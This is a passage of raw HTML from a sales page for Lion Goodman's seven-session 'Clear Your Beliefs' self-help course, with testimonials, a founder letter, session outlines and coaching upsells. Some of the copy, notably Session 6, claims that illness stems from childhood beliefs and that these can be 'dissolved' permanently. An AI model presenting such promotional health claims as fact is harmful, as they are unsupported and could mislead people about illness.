with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> 